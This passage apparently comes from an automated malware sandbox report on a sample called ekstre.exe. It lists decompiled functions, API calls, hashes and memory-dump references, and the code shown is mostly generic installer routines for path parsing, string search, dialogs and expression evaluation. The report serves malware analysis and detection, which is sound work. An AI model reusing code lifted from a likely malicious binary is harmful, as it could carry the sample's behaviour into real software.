CharNextA.USER32(0000000B,?,76E73410,007F9000,007EF000,0040336B,007F9000,007F9000,0040366D,?,00000007,00000009,0000000B), ref: 0040657C
CharPrevA.USER32(0000000B,0000000B,76E73410,007F9000,007EF000,0040336B,007F9000,007F9000,0040366D,?,00000007,00000009,0000000B), ref: 0040658C

Strings

*?|<>/":, xrefs: 0040655A

Memory Dump Source

Source File: 00000000.00000002.1117513142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1117477265.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117579894.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000078D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000791000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007BD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1119767205.00000000008BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: 28daa348592e837642e08a63fb50167dd7553375ed6c1e47afa6a3256008987e
Instruction ID: b36f46b949b72d285eb1b45185097b242d1b100a64a6db65b93a490dd3441615
Opcode Fuzzy Hash: 28daa348592e837642e08a63fb50167dd7553375ed6c1e47afa6a3256008987e
Instruction Fuzzy Hash: ED11E2518047E039FB3206286C44B7B7F988F9AB60F59047BE8C6722C6D67C5DA2826D

Uniqueness

Uniqueness Score: -1.00%

Function 6DE81C2B Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E6DE81C2B(signed int __edx, char _a8, void* _a16) {
				char _v8;
				char _v28;
				void* _v32;
				signed int _v36;
				signed int _v40;
				void* _t28;
				char _t31;
				char _t32;
				signed int _t33;
				signed int _t41;
				signed int _t42;
				signed int _t43;
				signed int _t44;
				signed int _t45;
				signed int _t46;
				signed int _t51;
				void* _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;
				signed int _t63;
				char _t67;
				signed int _t70;
				signed int _t72;
				void* _t79;
				void* _t81;
				signed int _t83;
				signed int _t86;
				void* _t91;

				_t70 = __edx;
				asm("xorps xmm0, xmm0");
				 *0x6de85040 = _a8;
				 *0x6de8503c = _a16;
				asm("movlpd [esp+0x10], xmm0");
				_t28 = E6DE8152B();
				_push(_t28);
				_v32 = _t28;
				_t72 = E6DE81326();
				_t63 = _t70;
				_t79 = E6DE8152B();
				_a16 = _t79;
				_t67 =  *_t79;
				_t31 = _t67;
				_a8 = _t31;
				if(_t67 == 0x7e) {
					L3:
					_t68 = _v36;
					_t83 = _v40;
					L4:
					_t32 = _t31;
					_t91 = _t32 - 0x2f;
					if(_t91 > 0) {
						_t33 = _t32 - 0x3c;
						__eflags = _t33;
						if(_t33 == 0) {
							__eflags =  *((char*)(_t79 + 1)) - 0x3c;
							if( *((char*)(_t79 + 1)) != 0x3c) {
								__eflags = _t63 - _t68;
								if(__eflags > 0) {
									L18:
									asm("xorps xmm0, xmm0");
									asm("movlpd [esp+0x10], xmm0");
									_t72 = _v40;
									_t63 = _v36;
									L19:
									_push( &_v28);
									_push(_t63);
									_push(_t72);
									E6DE8144D(_t68);
									E6DE8157E( &_v28);
									GlobalFree(_v32);
									return GlobalFree(_t79);
								}
								if(__eflags < 0) {
									L57:
									_t72 = 1;
									_t63 = 0;
									goto L19;
								}
								__eflags = _t72 - _t83;
								if(_t72 >= _t83) {
									goto L18;
								}
								goto L57;
							}
							_t70 = _t63;
							_t68 = _t83;
							_t41 = E6DE83090(_t72, _t83, _t70);
							L53:
							_t72 = _t41;
							_t63 = _t70;
							goto L19;
						}
						_t42 = _t33 - 1;
						__eflags = _t42;
						if(_t42 == 0) {
							__eflags = _t72 - _t83;
							if(_t72 != _t83) {
								goto L18;
							}
							__eflags = _t63 - _t68;
							L22:
							if(__eflags != 0) {
								goto L18;
							}
							goto L57;
						}
						_t43 = _t42 - 1;
						__eflags = _t43;
						if(_t43 == 0) {
							__eflags =  *((char*)(_t79 + 1)) - 0x3e;
							if( *((char*)(_t79 + 1)) != 0x3e) {
								__eflags = _t63 - _t68;
								if(__eflags < 0) {
									goto L18;
								}
								if(__eflags > 0) {
									goto L57;
								}
								__eflags = _t72 - _t83;
								if(_t72 <= _t83) {
									goto L18;
								}
								goto L57;
							}
							__eflags =  *((char*)(_t79 + 2)) - 0x3e;
							_t44 = _t72;
							_t70 = _t63;
							_t68 = _t83;
							if( *((char*)(_t79 + 2)) != 0x3e) {
								_t41 = E6DE830B0(_t44, _t68, _t70);
							} else {
								_t41 = E6DE830E0(_t44, _t68, _t70);
							}
							goto L53;
						}
						_t45 = _t43 - 0x20;
						__eflags = _t45;
						if(_t45 == 0) {
							_t72 = _t72 ^ _t83;
							_t63 = _t63 ^ _t68;
							goto L19;
						}
						_t46 = _t45 - 0x1e;
						__eflags = _t46;
						if(_t46 == 0) {
							__eflags =  *((char*)(_t79 + 1)) - 0x7c;
							if( *((char*)(_t79 + 1)) != 0x7c) {
								_t72 = _t72 | _t83;
								_t63 = _t63 | _t68;
								goto L19;
							}
							__eflags = _t72 | _t63;
							if((_t72 | _t63) != 0) {
								goto L57;
							}
							L17:
							__eflags = _t83 | _t68;
							if((_t83 | _t68) != 0) {
								goto L57;
							}
							goto L18;
						}
						__eflags = _t46 == 0;
						if(_t46 == 0) {
							_t72 =  !_t72;
							_t63 =  !_t63;
						}
						goto L19;
					}
					if(_t91 == 0) {
						L24:
						__eflags = _t83 | _t68;
						if((_t83 | _t68) != 0) {
							_push(_t68);
							_push(_t83);
							_push(_t63);
							_push(_t72);
							_t51 = E6DE82FB0();
							_t86 = _t63;
							_t72 = _t51;
							_t63 = _t70;
						} else {
							asm("xorps xmm0, xmm0");
							_t68 = _t72;
							asm("movlpd [esp+0x10], xmm0");
							_t86 = _t63;
							_t63 = _v36;
							_t72 = _v40;
						}
						__eflags = _v8 - 0x2f;
						if(_v8 != 0x2f) {
							_t72 = _t68;
							_t63 = _t86;
						}
						goto L19;
					}
					_t52 = _t32 - 0x21;
					if(_t52 == 0) {
						__eflags = _t72 | _t63;
						goto L22;
					}
					_t53 = _t52 - 4;
					if(_t53 == 0) {
						goto L24;
					}
					_t54 = _t53 - 1;
					if(_t54 == 0) {
						__eflags =  *((char*)(_t79 + 1)) - 0x26;
						if( *((char*)(_t79 + 1)) != 0x26) {
							_t72 = _t72 & _t83;
							_t63 = _t63 & _t68;
							goto L19;
						}
						__eflags = _t72 | _t63;
						if((_t72 | _t63) == 0) {
							goto L18;
						}
						goto L17;
					}
					_t55 = _t54 - 4;
					if(_t55 == 0) {
						_t41 = E6DE82ED0(_t72, _t63, _t83, _t68);
						goto L53;
					} else {
						_t56 = _t55 - 1;
						if(_t56 == 0) {
							_t72 = _t72 + _t83;
							asm("adc ebx, ecx");
						} else {
							if(_t56 == 0) {
								_t72 = _t72 - _t83;
								asm("sbb ebx, ecx");
							}
						}
						goto L19;
					}
				}
				_a8 = _t67;
				if(_t67 == 0x21) {
					goto L3;
				} else {
					_t81 = E6DE8152B();
					_push(_t81);
					_t83 = E6DE81326();
					_v40 = _t70;
					GlobalFree(_t81);
					_t79 = _a16;
					_t68 = _v40;
					_t31 =  *_t79;
					_a8 = _t31;
					goto L4;
				}
			}

0x6de81c2b
0x6de81c32
0x6de81c38
0x6de81c42
0x6de81c47
0x6de81c4d
0x6de81c52
0x6de81c53
0x6de81c5d
0x6de81c5f
0x6de81c66
0x6de81c68
0x6de81c6c
0x6de81c6e
0x6de81c70
0x6de81c77
0x6de81cad
0x6de81cad
0x6de81cb1
0x6de81cb5
0x6de81cb5
0x6de81cb8
0x6de81cbb
0x6de81da3
0x6de81da3
0x6de81da6
0x6de81e3b
0x6de81e3f
0x6de81e55
0x6de81e57
0x6de81d1a
0x6de81d1a
0x6de81d1d
0x6de81d23
0x6de81d27
0x6de81d2b
0x6de81d2f
0x6de81d30
0x6de81d31
0x6de81d32
0x6de81d3c
0x6de81d4e
0x6de81d5a
0x6de81d5a
0x6de81e5d
0x6de81e67
0x6de81e69
0x6de81e6a
0x00000000
0x6de81e6a
0x6de81e5f
0x6de81e61
0x00000000
0x00000000
0x00000000
0x6de81e61
0x6de81e43
0x6de81e45
0x6de81e47
0x6de81e4c
0x6de81e4c
0x6de81e4e
0x00000000
0x6de81e4e
0x6de81dac
0x6de81dac
0x6de81daf
0x6de81e2c
0x6de81e2e
0x00000000
0x00000000
0x6de81e34
0x6de81d63
0x6de81d63
0x00000000
0x00000000
0x00000000
0x6de81d65
0x6de81db1
0x6de81db1
0x6de81db4
0x6de81df8
0x6de81dfc
0x6de81e18
0x6de81e1a
0x00000000
0x00000000
0x6de81e20
0x00000000
0x00000000
0x6de81e22
0x6de81e24
0x00000000
0x00000000
0x00000000
0x6de81e2a
0x6de81dfe
0x6de81e02
0x6de81e04
0x6de81e06
0x6de81e08
0x6de81e11
0x6de81e0a
0x6de81e0a
0x6de81e0a
0x00000000
0x6de81e08
0x6de81db6
0x6de81db6
0x6de81db9
0x6de81def
0x6de81df1
0x00000000
0x6de81df1
0x6de81dbb
0x6de81dbb
0x6de81dbe
0x6de81dd3
0x6de81dd7
0x6de81de6
0x6de81de8
0x00000000
0x6de81de8
0x6de81dd9
0x6de81ddb
0x00000000
0x00000000
0x6de81d12
0x6de81d12
0x6de81d14
0x00000000
0x00000000
0x00000000
0x6de81d14
0x6de81dc1
0x6de81dc4
0x6de81dca
0x6de81dcc
0x6de81dcc
0x00000000
0x6de81dc4
0x6de81cc1
0x6de81d6a
0x6de81d6c
0x6de81d6e
0x6de81d87
0x6de81d88
0x6de81d89
0x6de81d8a
0x6de81d8b
0x6de81d90
0x6de81d92
0x6de81d94
0x6de81d70
0x6de81d70
0x6de81d73
0x6de81d75
0x6de81d7b
0x6de81d7d
0x6de81d81
0x6de81d81
0x6de81d96
0x6de81d9b
0x6de81d9d
0x6de81d9f
0x6de81d9f
0x00000000
0x6de81d9b
0x6de81cc7
0x6de81cca
0x6de81d61
0x00000000
0x6de81d61
0x6de81cd0
0x6de81cd3
0x00000000
0x00000000
0x6de81cd9
0x6de81cdc
0x6de81d08
0x6de81d0c
0x6de81d5b
0x6de81d5d
0x00000000
0x6de81d5d
0x6de81d0e
0x6de81d10
0x00000000
0x00000000
0x00000000
0x6de81d10
0x6de81cde
0x6de81ce1
0x6de81cfe
0x00000000
0x6de81ce3
0x6de81ce3
0x6de81ce6
0x6de81cf4
0x6de81cf6
0x6de81ce8
0x6de81cec
0x6de81cee
0x6de81cf0
0x6de81cf0
0x6de81cec
0x00000000
0x6de81ce6
0x6de81ce1
0x6de81c79
0x6de81c80
0x00000000
0x6de81c82
0x6de81c87
0x6de81c89
0x6de81c91
0x6de81c93
0x6de81c97
0x6de81c9d
0x6de81ca1
0x6de81ca5
0x6de81ca7
0x00000000
0x6de81ca7

APIs

GlobalFree.KERNEL32(00000000), ref: 6DE81C97
GlobalFree.KERNEL32(?), ref: 6DE81D4E
GlobalFree.KERNEL32(00000000), ref: 6DE81D51

Strings

/, xrefs: 6DE81D96

Memory Dump Source

Source File: 00000000.00000002.1181790668.000000006DE81000.00000020.00000001.01000000.00000004.sdmp, Offset: 6DE80000, based on PE: true

Associated: 00000000.00000002.1181679975.000000006DE80000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1181869899.000000006DE84000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1181977025.000000006DE86000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6de80000_ekstre.jbxd

Similarity

API ID: FreeGlobal
String ID: /
API String ID: 2979337801-2043925204
Opcode ID: c9331420632fefeb4f8de663051a99e5017110cfdee426e281f1df1275cc7e14
Instruction ID: f4c2903e764a9ae8f5b73aeab602fa784ac9e2ea27e64906b07852926c2b12c8
Opcode Fuzzy Hash: c9331420632fefeb4f8de663051a99e5017110cfdee426e281f1df1275cc7e14
Instruction Fuzzy Hash: BE51D472D1C3864FD3119EE8848473AB6E6AB8B20AF35451DE57CE3383DFA198468252

Uniqueness

Uniqueness Score: -1.00%

Function 00405C5F Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405C5F(CHAR* _a4) {
				CHAR* _t5;
				char* _t7;
				CHAR* _t9;
				char _t10;
				CHAR* _t11;
				void* _t13;

				_t11 = _a4;
				_t9 = CharNextA(_t11);
				_t5 = CharNextA(_t9);
				_t10 =  *_t11;
				if(_t10 == 0 ||  *_t9 != 0x3a || _t9[1] != 0x5c) {
					if(_t10 != 0x5c || _t11[1] != _t10) {
						L10:
						return 0;
					} else {
						_t13 = 2;
						while(1) {
							_t13 = _t13 - 1;
							_t7 = E00405BF1(_t5, 0x5c);
							if( *_t7 == 0) {
								goto L10;
							}
							_t5 = _t7 + 1;
							if(_t13 != 0) {
								continue;
							}
							return _t5;
						}
						goto L10;
					}
				} else {
					return CharNextA(_t5);
				}
			}

0x00405c68
0x00405c6f
0x00405c72
0x00405c74
0x00405c78
0x00405c8d
0x00405cac
0x00000000
0x00405c94
0x00405c96
0x00405c97
0x00405c9a
0x00405c9b
0x00405ca3
0x00000000
0x00000000
0x00405ca5
0x00405ca8
0x00000000
0x00000000
0x00000000
0x00405ca8
0x00000000
0x00405c97
0x00405c85
0x00000000
0x00405c86

APIs

CharNextA.USER32(?,?,C:\,0000000B,00405CCB,C:\,C:\,76E73410,?,007F9000,00405A16,?,76E73410,007F9000,007EF000), ref: 00405C6D
CharNextA.USER32(00000000), ref: 00405C72
CharNextA.USER32(00000000), ref: 00405C86

Strings

C:\, xrefs: 00405C60

Memory Dump Source

Source File: 00000000.00000002.1117513142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1117477265.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117579894.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000078D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000791000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007BD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1119767205.00000000008BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: CharNext
String ID: C:\
API String ID: 3213498283-3404278061
Opcode ID: 316c3355a28f754ee8ac0e81cdef43e8e77e46aced88bc4ffefd33f9dabad7a9
Instruction ID: 6677e57feecd2b3904743d950f08397bef8e365404460321078cee096d3b414b
Opcode Fuzzy Hash: 316c3355a28f754ee8ac0e81cdef43e8e77e46aced88bc4ffefd33f9dabad7a9
Instruction Fuzzy Hash: ECF06D5190CF616AFB2296684C44B7B5E8CCB56365F18447BEA80E62C2C2BC5C418F9A

Uniqueness

Uniqueness Score: -1.00%

Function 00402EA8 Relevance: 6.0, APIs: 4, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402EA8(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					__eflags =  *0x7a6d20; // 0x0
					if(__eflags == 0) {
						_t2 = GetTickCount();
						__eflags = _t2 -  *0x7c5f6c;
						if(_t2 >  *0x7c5f6c) {
							_t3 = CreateDialogParamA( *0x7c5f60, 0x6f, 0, E00402E25, 0);
							 *0x7a6d20 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E0040667C(0);
					}
				} else {
					_t6 =  *0x7a6d20; // 0x0
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x7a6d20 = 0;
					return _t6;
				}
			}

0x00402eaf
0x00402ec9
0x00402ecf
0x00402ed9
0x00402edf
0x00402ee5
0x00402ef6
0x00402eff
0x00000000
0x00402f04
0x00402f0b
0x00402ed1
0x00402ed8
0x00402ed8
0x00402eb1
0x00402eb1
0x00402eb8
0x00402ebb
0x00402ebb
0x00402ec1
0x00402ec8
0x00402ec8

APIs

DestroyWindow.USER32(00000000,00000000,00403086,00000001,?,?,004036DA,?,?,00000007,00000009,0000000B), ref: 00402EBB
GetTickCount.KERNEL32 ref: 00402ED9
CreateDialogParamA.USER32(0000006F,00000000,00402E25,00000000), ref: 00402EF6
ShowWindow.USER32(00000000,00000005,?,?,004036DA,?,?,00000007,00000009,0000000B), ref: 00402F04

Memory Dump Source

Source File: 00000000.00000002.1117513142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1117477265.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117579894.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000078D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000791000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007BD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1119767205.00000000008BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 79e47e6142323f01281f157b2eb48928d75afba3c8bbf5add18273d6f83e716b
Instruction ID: 9019c2d61de5b9d4ffe5237b8fad70af297e70399d9062f306a12dde5b1ef60b
Opcode Fuzzy Hash: 79e47e6142323f01281f157b2eb48928d75afba3c8bbf5add18273d6f83e716b
Instruction Fuzzy Hash: 8CF05E70641624ABCA116B60FE4CA9B7B65B749B52715853EF041B11F4DB7908818BEC

Uniqueness

Uniqueness Score: -1.00%

Function 6DE81E71 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 28
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6DE81E71(intOrPtr _a4, CHAR* _a8) {
				intOrPtr _t11;
				intOrPtr _t19;
				CHAR* _t21;

				_t11 = _a4;
				if( *((intOrPtr*)(_t11 + 4)) != 1) {
					_t21 = _a8;
					_t13 =  ==  ? 0x6de840c4 : 0x6de840bc;
					lstrcpyA(_t21,  ==  ? 0x6de840c4 : 0x6de840bc);
				} else {
					_t19 =  *((intOrPtr*)(_t11 + 0x1498));
					if(( *(_t11 + 0x810) & 0x00000100) != 0) {
						_t19 =  *((intOrPtr*)( *((intOrPtr*)(_t11 + 0x80c)) + 1));
					}
					_t21 = _a8;
					wsprintfA(_t21, "callback%d", _t19);
				}
				return _t21;
			}

0x6de81e71
0x6de81e7c
0x6de81eaf
0x6de81ebf
0x6de81ec4
0x6de81e7e
0x6de81e88
0x6de81e8e
0x6de81e96
0x6de81e96
0x6de81e99
0x6de81ea4
0x6de81eaa
0x6de81ecd

APIs

wsprintfA.USER32 ref: 6DE81EA4
lstrcpyA.KERNEL32(?,error,00000818,6DE816E5,00000000,?), ref: 6DE81EC4

Strings

error, xrefs: 6DE81EBA, 6DE81EC2
callback%d, xrefs: 6DE81E9E

Memory Dump Source

Source File: 00000000.00000002.1181790668.000000006DE81000.00000020.00000001.01000000.00000004.sdmp, Offset: 6DE80000, based on PE: true

Associated: 00000000.00000002.1181679975.000000006DE80000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1181869899.000000006DE84000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1181977025.000000006DE86000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6de80000_ekstre.jbxd

Similarity

API ID: lstrcpywsprintf
String ID: callback%d$error
API String ID: 2408954437-1307476583
Opcode ID: 456a6af775fbc28217e6b78ec855e2716f711728ce29a385374a0ad39a186c31
Instruction ID: f9c9c0d58de41d8d0b7c94677b067a9550567774d754190f1dab306fe5ebd0bc
Opcode Fuzzy Hash: 456a6af775fbc28217e6b78ec855e2716f711728ce29a385374a0ad39a186c31
Instruction Fuzzy Hash: 83F0FE702041509FC7048B44D959EBB73EAFF8A315F15C4A9F95D9B212DB70AC018B97

Uniqueness

Uniqueness Score: -1.00%

Function 00405D2C Relevance: 5.0, APIs: 4, Instructions: 37
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405D2C(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}

0x00405d3c
0x00405d3e
0x00405d41
0x00405d6d
0x00405d46
0x00405d4f
0x00405d54
0x00405d5f
0x00405d62
0x00405d7e
0x00405d64
0x00405d6b
0x00000000
0x00405d6b
0x00405d77
0x00405d7b
0x00405d7b
0x00405d75
0x00000000

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F87,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D3C
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D54
CharNextA.USER32(00000000,?,00000000,00405F87,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D65
lstrlenA.KERNEL32(00000000,?,00000000,00405F87,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D6E

Memory Dump Source

Source File: 00000000.00000002.1117513142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1117477265.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117579894.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000078D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000791000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007BD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1119767205.00000000008BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
Instruction ID: 56b30ab9728cc1bcdc2a7ccee21f79e87515508fba5cd4226cf82d87f860e42d
Opcode Fuzzy Hash: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
Instruction Fuzzy Hash: 0AF0C231204818AFCB029FA4DD44D9EBBA8EF56350B2580BAE840F7211D634DE019BA8

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: ekstre.exePID: 6096, Parent PID: 7268COMMON

Execution Graph

Execution Coverage:	0%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	100%
Total number of Nodes:	1
Total number of Limit Nodes:	0

Executed Functions

Function 341B2C30 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 341B2C3A

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 89e3e0ee17355be78a0d15e3060b773fa6587812e0d7d5443e09805ff4b8d803
Instruction ID: d2f9feb443e12dce35f217cb54196a772af5319eca1f402b6c308ede73f74ccd
Opcode Fuzzy Hash: 89e3e0ee17355be78a0d15e3060b773fa6587812e0d7d5443e09805ff4b8d803
Instruction Fuzzy Hash: F190022925340002E5807158598860B000547E1247F91D81AA0017558CC975CC6D6331

Uniqueness

Uniqueness Score: -1.00%

Function 341B2C50 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 341B2C5A

